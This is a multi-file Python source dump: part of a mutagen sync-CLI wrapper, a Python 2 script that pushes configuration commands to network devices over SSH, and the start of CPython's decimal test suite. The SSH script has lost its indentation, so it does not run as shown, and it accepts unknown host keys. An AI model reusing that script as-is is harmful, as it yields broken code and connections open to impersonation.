                sessions.append(stack[0])
                previous_key = None
                current_session = {}
                stack = [current_session]
            elif self._is_no_session_line(line):
                sessions = []
                break
            else:
                if ':' in line:
                    key, value = line.split(":", 1)
                    stack_size = key.count('\t') + 1
                    key = key.strip()
                    value = value.strip()
                    if stack_size == len(stack) + 1:
                        # One level deeper: open a nested dict under the
                        # previous key, which must have had no scalar value.
                        current_object = {}
                        if stack[-1][previous_key]:
                            raise WrapperRunException("Invalid structure for mutagen output", result=result)
                        stack[-1][previous_key] = current_object
                        stack.append(current_object)
                    else:
                        # Same level or shallower: unwind to that depth.
                        stack = stack[:stack_size]
                    stack[-1][key] = value
                    previous_key = key
                else:
                    value = line
                    stack_size = value.count('\t') + 1
                    value = value.strip()
                    if value == '':
                        continue
                    if stack_size == len(stack) + 1:
                        # Bare values one level deeper form a nested list.
                        current_object = []
                        if stack[-1][previous_key]:
                            raise WrapperRunException("Invalid structure for mutagen output", result=result)
                        stack[-1][previous_key] = current_object
                        stack.append(current_object)
                    else:
                        stack = stack[:stack_size]
                    if isinstance(current_object, list):
                        current_object.append(value)
                    else:
                        raise WrapperRunException("Invalid structure for mutagen output", result=result)
        return sessions
class ProcessWrapper:
    """Run a subprocess while multiplexing its stdout/stderr (and, if it
    seems to be waiting for input, the user's stdin) through a queue."""

    # Tags used on queue entries to identify the originating stream.
    STDIN = 0
    STDOUT = 1
    STDERR = 2

    def run(self, command, print_output=False, print_output_if_idle=5000):
        """Run `command`, returning a CompletedProcess with captured output.

        If no output arrives for `print_output_if_idle` milliseconds while
        some is already recorded, assume the command wants user input: echo
        everything seen so far and start forwarding stdin.
        """
        logging.debug('Running command: %s' % shlex.quote(' '.join(command)))
        process = subprocess.Popen(command,
                                   stdin=subprocess.PIPE,
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE)

        def enqueue_output(process, out, stream_type, queue):
            # Pump one of the child's output pipes into the shared queue.
            while True:
                data = out.read(1)
                if data:
                    queue.put((stream_type, data))
                if process.poll() is not None:
                    # Child exited: drain whatever is left, then close.
                    data = out.read()
                    if data:
                        queue.put((stream_type, data))
                    out.close()
                    break

        def listen_stdin(queue):
            # Forward the user's stdin to the queue until the child exits.
            while True:
                data = sys.stdin.read(1)
                if data:
                    queue.put((ProcessWrapper.STDIN, data.encode(sys.stdin.encoding)))
                if process.poll() is not None:
                    data = sys.stdin.read()
                    if data:
                        queue.put((ProcessWrapper.STDIN, data))
                    break

        queue = Queue()
        thread = Thread(target=enqueue_output, args=(process, process.stdout, ProcessWrapper.STDOUT, queue))
        thread.daemon = True
        thread.start()
        stderr_thread = Thread(target=enqueue_output, args=(process, process.stderr, ProcessWrapper.STDERR, queue))
        stderr_thread.daemon = True
        stderr_thread.start()
        # The stdin listener is only started lazily, when the command looks idle.
        stdin_thread = Thread(target=listen_stdin, args=(queue,))
        stdin_thread.daemon = True
        stdin_thread_started = False

        # read line without blocking
        stdout = b''
        stderr = b''
        stdin = b''
        recorded = []
        last_read_time = int(round(time.time() * 1000))
        while True:
            stream, data = (None, None)
            try:
                stream, data = queue.get_nowait()
                if stream == ProcessWrapper.STDERR or stream == ProcessWrapper.STDOUT:
                    recorded.append((stream, data))
                last_read_time = int(round(time.time() * 1000))
            except Empty:
                if process.stdout.closed and process.stderr.closed:
                    if queue.qsize() == 0:
                        # Both pipes drained and the queue is empty: done.
                        break
                else:
                    if recorded and int(round(time.time() * 1000)) - last_read_time > print_output_if_idle:
                        # The command has been silent for a while: it probably
                        # wants input.  Echo what we have and forward stdin.
                        logging.warning("The following mutagen command seems to require your input: ")
                        logging.warning(shlex.quote(' '.join(command))[1:-1])
                        logging.warning("Please enter your input if required, or kindly wait for it to terminate.")
                        print_output = True
                        for stream, data in recorded:
                            if stream == ProcessWrapper.STDOUT:
                                sys.stdout.buffer.write(data)
                                sys.stdout.flush()
                            elif stream == ProcessWrapper.STDERR:
                                sys.stderr.buffer.write(data)
                                sys.stderr.flush()
                        if not stdin_thread_started:
                            stdin_thread_started = True
                            stdin_thread.start()
                        recorded = []
                continue
            if stream == ProcessWrapper.STDOUT:
                stdout = stdout + data
                if print_output:
                    sys.stdout.buffer.write(data)
            elif stream == ProcessWrapper.STDERR:
                stderr = stderr + data
                if print_output:
                    sys.stderr.buffer.write(data)
            elif stream == ProcessWrapper.STDIN:
                stdin = stdin + data
                process.stdin.write(data)
                process.stdin.flush()
        return subprocess.CompletedProcess(process.args, process.returncode,
                                           str(stdout, encoding=sys.stdout.encoding),
                                           str(stderr, encoding=sys.stdout.encoding)
                                           )
class MutagenWrapper(ProcessWrapper):
    """High-level wrapper around the mutagen command line client."""

    def __init__(self, mutagen="mutagen.exe" if os.name == 'nt' else "mutagen"):
        self.mutagen = mutagen                  # name/path of the mutagen binary
        self.list_parser = MutagenListParser()

    def run(self, command, print_output=False, print_output_on_idle=5000):
        """Run a mutagen subcommand, raising on daemon-down or failure."""
        result = super().run([self.mutagen] + command, print_output, print_output_on_idle)
        if result.returncode == 1 and 'unable to connect to daemon' in result.stderr:
            raise DaemonNotRunningException("Mutagen daemon doesn't seems to run. "
                                            "Start the daemon with \"mutagen daemon start\" command and try again.",
                                            result=result)
        if result.returncode != 0:
            raise MutagenRunException("Mutagen has failed to execute a command: " +
                                      (shlex.quote(' '.join([self.mutagen] + command))[1:-1]) +
                                      (os.linesep + result.stdout if result.stdout else '') +
                                      (os.linesep + result.stderr if result.stderr else ''),
                                      result=result)
        return result

    def create(self, alpha, beta, options=None):
        """Creates a new session.

        :param alpha: alpha endpoint
        :param beta: beta endpoint
        :param options: dict (keys become --flags, list values repeat the
            flag, bool values are bare flags), shell-style string, or list
        :return: the id of the created session
        """
        if isinstance(options, dict):
            options_list = []
            for k, v in options.items():
                if v:
                    if isinstance(v, list):
                        for item in v:
                            options_list.append('--' + str(k))
                            options_list.append(str(item))
                    else:
                        options_list.append('--' + str(k))
                        if not isinstance(v, bool):
                            options_list.append(str(v))
            options = options_list
        elif isinstance(options, str):
            options = shlex.split(options)
        command = ['sync', 'create', alpha, beta] + (list(options) if options else [])
        result = self.run(command)
        ret = result.stdout
        match = re.search('Created session\\s(.*?)\\s', ret)
        if match:
            return match.group(1)
        raise WrapperException("Invalid response: " + ret)

    def terminate(self, session_id=None, label_selector=None, one=False):
        result = self._session_control('terminate', session_id, label_selector)
        ret = result.stdout
        session_ids = re.findall('Terminating session\\s(.*?)\\.', ret)
        return self._handle_result(result, session_ids, one)

    def flush(self, session_id=None, label_selector=None, one=False):
        result = self._session_control('flush', session_id, label_selector)
        ret = result.stdout
        session_ids = re.findall('for session\\s(.*?)\\.', ret)
        return self._handle_result(result, session_ids, one)

    def pause(self, session_id=None, label_selector=None, one=False):
        result = self._session_control('pause', session_id, label_selector)
        ret = result.stdout
        session_ids = re.findall('Pausing session\\s(.*?)\\.', ret)
        return self._handle_result(result, session_ids, one)

    def resume(self, session_id=None, label_selector=None, one=False):
        result = self._session_control('resume', session_id, label_selector)
        ret = result.stdout
        session_ids = re.findall('Resuming session\\s(.*?)\\.', ret)
        return self._handle_result(result, session_ids, one)

    def _session_control(self, command, session_id, label_selector):
        """Run a sync subcommand against one session, a selector, or --all."""
        args = ['sync', command]
        if session_id:
            args.append(session_id)
        elif label_selector:
            args.append('--label-selector')
            args.append(label_selector)
        else:
            args.append('--all')
        return self.run(args)

    def list(self, session_id=None, label_selector=None, long=False, one=False):
        try:
            args = ['sync', 'list']
            if session_id:
                args.append(session_id)
            if label_selector:
                args.append('--label-selector')
                args.append(label_selector)
            if long:
                args.append('--long')
            result = self.run(args)
        except MutagenRunException as e:
            # "no such session" is not an error for list(); report empty.
            if 'unable to locate requested sessions' in e.result.stderr:
                return []
            raise
        parsed = self.list_parser.parse(result.stdout, result)
        return self._handle_result(result, parsed, one)

    def _handle_result(self, result, items, one):
        """Return `items`, or a single item (or None) when `one` is set."""
        if one:
            if len(items) > 1:
                # BUG FIX: WrapperRunException subclasses require `result` as
                # a keyword; the original passed it positionally, which made
                # this line raise a confusing KeyError instead.
                raise MultipleSessionsException("Multiple sessions found when exactly one was expected",
                                                result=result)
            elif len(items) == 1:
                return items[0]
            else:
                return None
        return items
|
SSH-Config-Final.py | import paramiko
import threading
import os.path
import subprocess
import time
import sys
import re
#Checking IP address file and content validity
def ip_is_valid():
check = False
global ip_list
while True:
#Prompting user for input
print "\n# # # # # # # # # # # # # # # # # # # # # # # # # # # #\n"
ip_file = raw_input("# Enter IP file name and extension: ")
print "\n# # # # # # # # # # # # # # # # # # # # # # # # # # # #"
#Changing exception message
try:
#Open user selected file for reading (IP addresses file)
selected_ip_file = open(ip_file, 'r')
#Starting from the beginning of the file
selected_ip_file.seek(0)
#Reading each line (IP address) in the file
ip_list = selected_ip_file.readlines()
#Closing the file
selected_ip_file.close()
except IOError:
print "\n* File %s does not exist! Please check and try again!\n" % ip_file
#Checking octets
for ip in ip_list:
a = ip.split('.')
if (len(a) == 4) and (1 <= int(a[0]) <= 223) and (int(a[0]) != 127) and (int(a[0]) != 169 or int(a[1]) != 254) and (0 <= int(a[1]) <= 255 and 0 <= int(a[2]) <= 255 and 0 <= int(a[3]) <= 255):
check = True
break
else:
print '\n* There was an INVALID IP address! Please check and try again!\n'
check = False
continue
#Evaluating the 'check' flag
if check == False:
continue
elif check == True:
break
#Checking IP reachability
print "\n* Checking IP reachability. Please wait...\n"
check2 = False
while True:
for ip in ip_list:
ping_reply = subprocess.call(['ping', '-c', '2', '-w', '2', '-q', '-n', ip])
if ping_reply == 0:
check2 = True
continue
elif ping_reply == 2:
print "\n* No response from device %s." % ip
check2 = False
break
else:
print "\n* Ping to the following device has FAILED:", ip
check2 = False
break
#Evaluating the 'check' flag
if check2 == False:
print "* Please re-check IP address list or device.\n"
ip_is_valid()
elif check2 == True:
print '\n* All devices are reachable. Waiting for username/password file...\n'
break
#Checking user file validity
def user_is_valid():
global user_file
while True:
print "# # # # # # # # # # # # # # # # # # # # # # # # # # # #\n"
user_file = raw_input("# Enter user/pass file name and extension: ")
print "\n# # # # # # # # # # # # # # # # # # # # # # # # # # # #"
#Changing output messages
if os.path.isfile(user_file) == True:
print "\n* Username/password file has been validated. Waiting for command file...\n"
break
else:
print "\n* File %s does not exist! Please check and try again!\n" % user_file
continue
#Checking command file validity
def cmd_is_valid():
global cmd_file
while True:
print "\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # #\n"
cmd_file = raw_input("# Enter command file name and extension: ")
print "\n# # # # # # # # # # # # # # # # # # # # # # # # # # # #"
#Changing output messages
if os.path.isfile(cmd_file) == True:
print "\n* Sending command(s) to device(s)...\n"
break
else:
print "\n* File %s does not exist! Please check and try again!\n" % cmd_file
continue
#Change exception message
try:
#Calling IP validity function
ip_is_valid()
except KeyboardInterrupt:
print "\n\n* Program aborted by user. Exiting...\n"
sys.exit()
#Change exception message
try:
#Calling user file validity function
user_is_valid()
except KeyboardInterrupt:
print "\n\n* Program aborted by user. Exiting...\n"
sys.exit()
#Change exception message
try:
#Calling command file validity function
cmd_is_valid()
except KeyboardInterrupt:
print "\n\n* Program aborted by user. Exiting...\n"
sys.exit()
#Open SSHv2 connection to devices
def open_ssh_conn(ip):
#Change exception message
try:
#Define SSH parameters
selected_user_file = open(user_file, 'r')
#Starting from the beginning of the file
selected_user_file.seek(0)
#Reading the username from the file
username = selected_user_file.readlines()[0].split(',')[0]
#Starting from the beginning of the file
selected_user_file.seek(0)
#Reading the password from the file
password = selected_user_file.readlines()[0].split(',')[1].rstrip("\n")
#Logging into device
session = paramiko.SSHClient()
#For testing purposes, this allows auto-accepting unknown host keys
#Do not use in production! The default would be RejectPolicy
session.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#Connect to the device using username and password
session.connect(ip, username = username, password = password)
#Start an interactive shell session on the router
connection = session.invoke_shell()
#Setting terminal length for entire output - disable pagination
connection.send("terminal length 0\n")
time.sleep(1)
#Entering global config mode
connection.send("\n")
connection.send("configure terminal\n")
time.sleep(1)
#Open user selected file for reading
selected_cmd_file = open(cmd_file, 'r')
#Starting from the beginning of the file
selected_cmd_file.seek(0)
#Writing each line in the file to the device
for each_line in selected_cmd_file.readlines():
connection.send(each_line + '\n')
time.sleep(2)
#Closing the user file
selected_user_file.close()
#Closing the command file
selected_cmd_file.close()
#Checking command output for IOS syntax errors
router_output = connection.recv(65535)
if re.search(r"% Invalid input detected at", router_output):
print "* There was at least one IOS syntax error on device %s" % ip
else:
print "\nDONE for device %s" % ip
#Test for reading command output
#print router_output + "\n"
#Closing the connection
session.close()
except paramiko.AuthenticationException:
print "* Invalid username or password. \n* Please check the username/password file or the device configuration!"
print "* Closing program...\n"
#Creating threads
def create_threads():
    #Run open_ssh_conn() against every device in the global ip_list
    #concurrently, then wait for all of them to finish.
    threads = []
    for ip in ip_list:
        th = threading.Thread(target = open_ssh_conn, args = (ip,)) #args is a tuple with a single element
        th.start()
        threads.append(th)
    for th in threads:
        th.join()

#Calling threads creation function
create_threads()
#End of program
|
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import inspect
import threading
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
    """Assert that exactly the signals in `expected` are set in `context.attr`.

    `attr` names a dict-like attribute of `context` (e.g. 'flags' or 'traps')
    mapping signal -> bool; every signal in `expected` must be set and every
    other signal must be clear.
    """
    d = getattr(context, attr)
    cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
    """Install the default test context on implementation module *m*.

    The default context has prec=9, ROUND_HALF_EVEN rounding and all
    traps disabled.  A falsy *m* (e.g. C being None because the
    accelerator is unavailable) is a no-op.
    """
    if not m:
        return
    default_context = m.Context(
        prec=9,
        rounding=ROUND_HALF_EVEN,
        traps=dict.fromkeys(Signals[m], 0),
    )
    m.setcontext(default_context)
# Directory holding Cowlishaw's .decTest data files; the IBM test cases
# are skipped entirely when the data set is not present.
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
    file = sys.argv[0]
else:
    file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep

skip_expected = not os.path.isdir(directory)

# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False

# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
# hasattr() already returns a bool (and is False for C is None), so the
# redundant `True if ... else False` conditional is unnecessary.
EXTRA_FUNCTIONALITY = hasattr(C, 'DecClamped')
requires_extra_functionality = unittest.skipUnless(
    EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
    EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
    """Class which tests the Decimal class against the IBM test cases.

    Subclasses select the implementation under test via the ``decimal``
    class attribute (C accelerator or pure Python module).
    """

    def setUp(self):
        # Working context for executing test operations, plus a separate
        # context used only for reading (possibly huge) operands.
        self.context = self.decimal.Context()
        self.readcontext = self.decimal.Context()
        self.ignore_list = ['#']

        # List of individual .decTest test ids that correspond to tests that
        # we're skipping for one reason or another.
        self.skipped_test_ids = set([
            # Skip implementation-specific scaleb tests.
            'scbx164',
            'scbx165',

            # For some operations (currently exp, ln, log10, power), the decNumber
            # reference implementation imposes additional restrictions on the context
            # and operands. These restrictions are not part of the specification;
            # however, the effect of these restrictions does show up in some of the
            # testcases. We skip testcases that violate these restrictions, since
            # Decimal behaves differently from decNumber for these testcases so these
            # testcases would otherwise fail.
            'expx901',
            'expx902',
            'expx903',
            'expx905',
            'lnx901',
            'lnx902',
            'lnx903',
            'lnx905',
            'logx901',
            'logx902',
            'logx903',
            'logx905',
            'powx1183',
            'powx1184',
            'powx4001',
            'powx4002',
            'powx4003',
            'powx4005',
            'powx4008',
            'powx4010',
            'powx4012',
            'powx4014',
            ])

        if self.decimal == C:
            # status has additional Subnormal, Underflow
            self.skipped_test_ids.add('pwsx803')
            self.skipped_test_ids.add('pwsx805')
            # Correct rounding (skipped for decNumber, too)
            self.skipped_test_ids.add('powx4302')
            self.skipped_test_ids.add('powx4303')
            self.skipped_test_ids.add('powx4342')
            self.skipped_test_ids.add('powx4343')
            # http://bugs.python.org/issue7049
            self.skipped_test_ids.add('pwmx325')
            self.skipped_test_ids.add('pwmx326')

        # Map test directives to setter functions.
        self.ChangeDict = {'precision' : self.change_precision,
                           'rounding' : self.change_rounding_method,
                           'maxexponent' : self.change_max_exponent,
                           'minexponent' : self.change_min_exponent,
                           'clamp' : self.change_clamp}

        # Name adapter to be able to change the Decimal and Context
        # interface without changing the test files from Cowlishaw.
        self.NameAdapter = {'and':'logical_and',
                            'apply':'_apply',
                            'class':'number_class',
                            'comparesig':'compare_signal',
                            'comparetotal':'compare_total',
                            'comparetotmag':'compare_total_mag',
                            'copy':'copy_decimal',
                            'copyabs':'copy_abs',
                            'copynegate':'copy_negate',
                            'copysign':'copy_sign',
                            'divideint':'divide_int',
                            'invert':'logical_invert',
                            'iscanonical':'is_canonical',
                            'isfinite':'is_finite',
                            'isinfinite':'is_infinite',
                            'isnan':'is_nan',
                            'isnormal':'is_normal',
                            'isqnan':'is_qnan',
                            'issigned':'is_signed',
                            'issnan':'is_snan',
                            'issubnormal':'is_subnormal',
                            'iszero':'is_zero',
                            'maxmag':'max_mag',
                            'minmag':'min_mag',
                            'nextminus':'next_minus',
                            'nextplus':'next_plus',
                            'nexttoward':'next_toward',
                            'or':'logical_or',
                            'reduce':'normalize',
                            'remaindernear':'remainder_near',
                            'samequantum':'same_quantum',
                            'squareroot':'sqrt',
                            'toeng':'to_eng_string',
                            'tointegral':'to_integral_value',
                            'tointegralx':'to_integral_exact',
                            'tosci':'to_sci_string',
                            'xor':'logical_xor'}

        # Map test-case names to roundings.
        self.RoundingDict = {'ceiling' : ROUND_CEILING,
                             'down' : ROUND_DOWN,
                             'floor' : ROUND_FLOOR,
                             'half_down' : ROUND_HALF_DOWN,
                             'half_even' : ROUND_HALF_EVEN,
                             'half_up' : ROUND_HALF_UP,
                             'up' : ROUND_UP,
                             '05up' : ROUND_05UP}

        # Map the test cases' error names to the actual errors.
        self.ErrorNames = {'clamped' : self.decimal.Clamped,
                           'conversion_syntax' : self.decimal.InvalidOperation,
                           'division_by_zero' : self.decimal.DivisionByZero,
                           'division_impossible' : self.decimal.InvalidOperation,
                           'division_undefined' : self.decimal.InvalidOperation,
                           'inexact' : self.decimal.Inexact,
                           'invalid_context' : self.decimal.InvalidOperation,
                           'invalid_operation' : self.decimal.InvalidOperation,
                           'overflow' : self.decimal.Overflow,
                           'rounded' : self.decimal.Rounded,
                           'subnormal' : self.decimal.Subnormal,
                           'underflow' : self.decimal.Underflow}

        # The following functions return True/False rather than a
        # Decimal instance.
        self.LogicalFunctions = ('is_canonical',
                                 'is_finite',
                                 'is_infinite',
                                 'is_nan',
                                 'is_normal',
                                 'is_qnan',
                                 'is_signed',
                                 'is_snan',
                                 'is_subnormal',
                                 'is_zero',
                                 'same_quantum')

    def read_unlimited(self, v, context):
        """Work around the limitations of the 32-bit _decimal version. The
        guaranteed maximum values for prec, Emax etc. are 425000000,
        but higher values usually work, except for rare corner cases.
        In particular, all of the IBM tests pass with maximum values
        of 1070000000."""
        if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
            self.readcontext._unsafe_setprec(1070000000)
            self.readcontext._unsafe_setemax(1070000000)
            self.readcontext._unsafe_setemin(-1070000000)
            return self.readcontext.create_decimal(v)
        else:
            return self.decimal.Decimal(v, context)

    def eval_file(self, file):
        """Feed every line of a .decTest file through eval_line().

        An unexpected DecimalException from any line is a test failure.
        """
        global skip_expected
        if skip_expected:
            raise unittest.SkipTest
        with open(file) as f:
            for line in f:
                # Normalize line endings before parsing.
                line = line.replace('\r\n', '').replace('\n', '')
                #print line
                try:
                    t = self.eval_line(line)
                except self.decimal.DecimalException as exception:
                    #Exception raised where there shouldn't have been one.
                    self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)

    def eval_line(self, s):
        """Strip comments from *s* and dispatch: directives (``name:value``)
        go to eval_directive(), test equations go to eval_equation()."""
        # Keep the '->' portion intact while dropping any trailing
        # '--' comment; otherwise the whole line may be a comment.
        if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
            s = (s.split('->')[0] + '->' +
                 s.split('->')[1].split('--')[0]).strip()
        else:
            s = s.split('--')[0].strip()

        for ignore in self.ignore_list:
            if s.find(ignore) >= 0:
                #print s.split()[0], 'NotImplemented--', ignore
                return
        if not s:
            return
        elif ':' in s:
            return self.eval_directive(s)
        else:
            return self.eval_equation(s)

    def eval_directive(self, s):
        """Apply a 'name: value' context directive (precision, rounding,
        max/min exponent, clamp); unknown directives are silently ignored."""
        funct, value = (x.strip().lower() for x in s.split(':'))
        if funct == 'rounding':
            value = self.RoundingDict[value]
        else:
            try:
                value = int(value)
            except ValueError:
                pass

        # Unknown directive names fall through to a no-op.
        funct = self.ChangeDict.get(funct, (lambda *args: None))
        funct(value)

    def eval_equation(self, s):
        """Parse and run one 'id operation operands -> result conditions'
        test line, checking both the result string and the signals set."""
        # Sample only ~10% of the cases unless TEST_ALL is requested.
        if not TEST_ALL and random.random() < 0.90:
            return
        self.context.clear_flags()

        try:
            Sides = s.split('->')
            L = Sides[0].strip().split()
            id = L[0]
            if DEBUG:
                print("Test ", id, end=" ")
            funct = L[1].lower()
            valstemp = L[2:]
            L = Sides[1].strip().split()
            ans = L[0]
            exceptions = L[1:]
        except (TypeError, AttributeError, IndexError):
            raise self.decimal.InvalidOperation
        def FixQuotes(val):
            # Collapse doubled quotes to literal quote characters while
            # removing the surrounding quoting.
            val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
            val = val.replace("'", '').replace('"', '')
            val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
            return val

        if id in self.skipped_test_ids:
            return

        fname = self.NameAdapter.get(funct, funct)
        if fname == 'rescale':
            return
        funct = getattr(self.context, fname)
        vals = []
        conglomerate = ''
        quote = 0
        theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]

        # Trap every signal except the ones the test expects to see.
        for exception in Signals[self.decimal]:
            self.context.traps[exception] = 1 #Catch these bugs...
        for exception in theirexceptions:
            self.context.traps[exception] = 0
        for i, val in enumerate(valstemp):
            # Re-assemble quoted operands that were split on whitespace.
            if val.count("'") % 2 == 1:
                quote = 1 - quote
            if quote:
                conglomerate = conglomerate + ' ' + val
                continue
            else:
                val = conglomerate + val
                conglomerate = ''
            v = FixQuotes(val)
            if fname in ('to_sci_string', 'to_eng_string'):
                if EXTENDEDERRORTEST:
                    for error in theirexceptions:
                        self.context.traps[error] = 1
                        try:
                            funct(self.context.create_decimal(v))
                        except error:
                            pass
                        except Signals[self.decimal] as e:
                            self.fail("Raised %s in %s when %s disabled" % \
                                      (e, s, error))
                        else:
                            self.fail("Did not raise %s in %s" % (error, s))
                        self.context.traps[error] = 0
                v = self.context.create_decimal(v)
            else:
                v = self.read_unlimited(v, self.context)
            vals.append(v)

        ans = FixQuotes(ans)

        # With each expected condition trapped in turn, the operation must
        # raise exactly that condition.
        if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
            for error in theirexceptions:
                self.context.traps[error] = 1
                try:
                    funct(*vals)
                except error:
                    pass
                except Signals[self.decimal] as e:
                    self.fail("Raised %s in %s when %s disabled" % \
                              (e, s, error))
                else:
                    self.fail("Did not raise %s in %s" % (error, s))
                self.context.traps[error] = 0

            # as above, but add traps cumulatively, to check precedence
            ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
            for error in ordered_errors:
                self.context.traps[error] = 1
                try:
                    funct(*vals)
                except error:
                    pass
                except Signals[self.decimal] as e:
                    self.fail("Raised %s in %s; expected %s" %
                              (type(e), s, error))
                else:
                    self.fail("Did not raise %s in %s" % (error, s))
            # reset traps
            for error in ordered_errors:
                self.context.traps[error] = 0

        if DEBUG:
            print("--", self.context)
        try:
            result = str(funct(*vals))
            if fname in self.LogicalFunctions:
                result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
        except Signals[self.decimal] as error:
            self.fail("Raised %s in %s" % (error, s))
        except: #Catch any error long enough to state the test case.
            print("ERROR:", s)
            raise

        myexceptions = self.getexceptions()

        # Compare as sorted lists so ordering differences don't matter.
        myexceptions.sort(key=repr)
        theirexceptions.sort(key=repr)

        self.assertEqual(result, ans,
                         'Incorrect answer for ' + s + ' -- got ' + result)

        self.assertEqual(myexceptions, theirexceptions,
                         'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))

    def getexceptions(self):
        """Return the list of signals currently set in the working context."""
        return [e for e in Signals[self.decimal] if self.context.flags[e]]

    def change_precision(self, prec):
        """Set context precision, using the unsafe setter where the C
        module was built with 32-bit limits."""
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setprec(prec)
        else:
            self.context.prec = prec

    def change_rounding_method(self, rounding):
        """Set the context rounding mode."""
        self.context.rounding = rounding

    def change_min_exponent(self, exp):
        """Set Emin, using the unsafe setter on 32-bit _decimal builds."""
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setemin(exp)
        else:
            self.context.Emin = exp

    def change_max_exponent(self, exp):
        """Set Emax, using the unsafe setter on 32-bit _decimal builds."""
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setemax(exp)
        else:
            self.context.Emax = exp

    def change_clamp(self, clamp):
        """Set the context clamp flag."""
        self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
    # Run the IBM test cases against the C accelerator (_decimal).
    decimal = C
class PyIBMTestCases(IBMTestCases):
    # Run the IBM test cases against the pure-Python implementation.
    decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
    '''Unit tests for Explicit Construction cases of Decimal.

    Subclasses select the implementation via the ``decimal`` attribute.
    '''

    def test_explicit_empty(self):
        Decimal = self.decimal.Decimal
        self.assertEqual(Decimal(), Decimal("0"))

    def test_explicit_from_None(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, Decimal, None)

    def test_explicit_from_int(self):
        Decimal = self.decimal.Decimal

        #positive
        d = Decimal(45)
        self.assertEqual(str(d), '45')

        #very large positive
        d = Decimal(500000123)
        self.assertEqual(str(d), '500000123')

        #negative
        d = Decimal(-45)
        self.assertEqual(str(d), '-45')

        #zero
        d = Decimal(0)
        self.assertEqual(str(d), '0')

        # single word longs: values straddling every power of two up to 2**31
        for n in range(0, 32):
            for sign in (-1, 1):
                for x in range(-5, 5):
                    i = sign * (2**n + x)
                    d = Decimal(i)
                    self.assertEqual(str(d), str(i))

    def test_explicit_from_string(self):
        Decimal = self.decimal.Decimal
        InvalidOperation = self.decimal.InvalidOperation
        localcontext = self.decimal.localcontext

        #empty
        self.assertEqual(str(Decimal('')), 'NaN')

        #int
        self.assertEqual(str(Decimal('45')), '45')

        #float
        self.assertEqual(str(Decimal('45.34')), '45.34')

        #engineer notation
        self.assertEqual(str(Decimal('45e2')), '4.5E+3')

        #just not a number
        self.assertEqual(str(Decimal('ugly')), 'NaN')

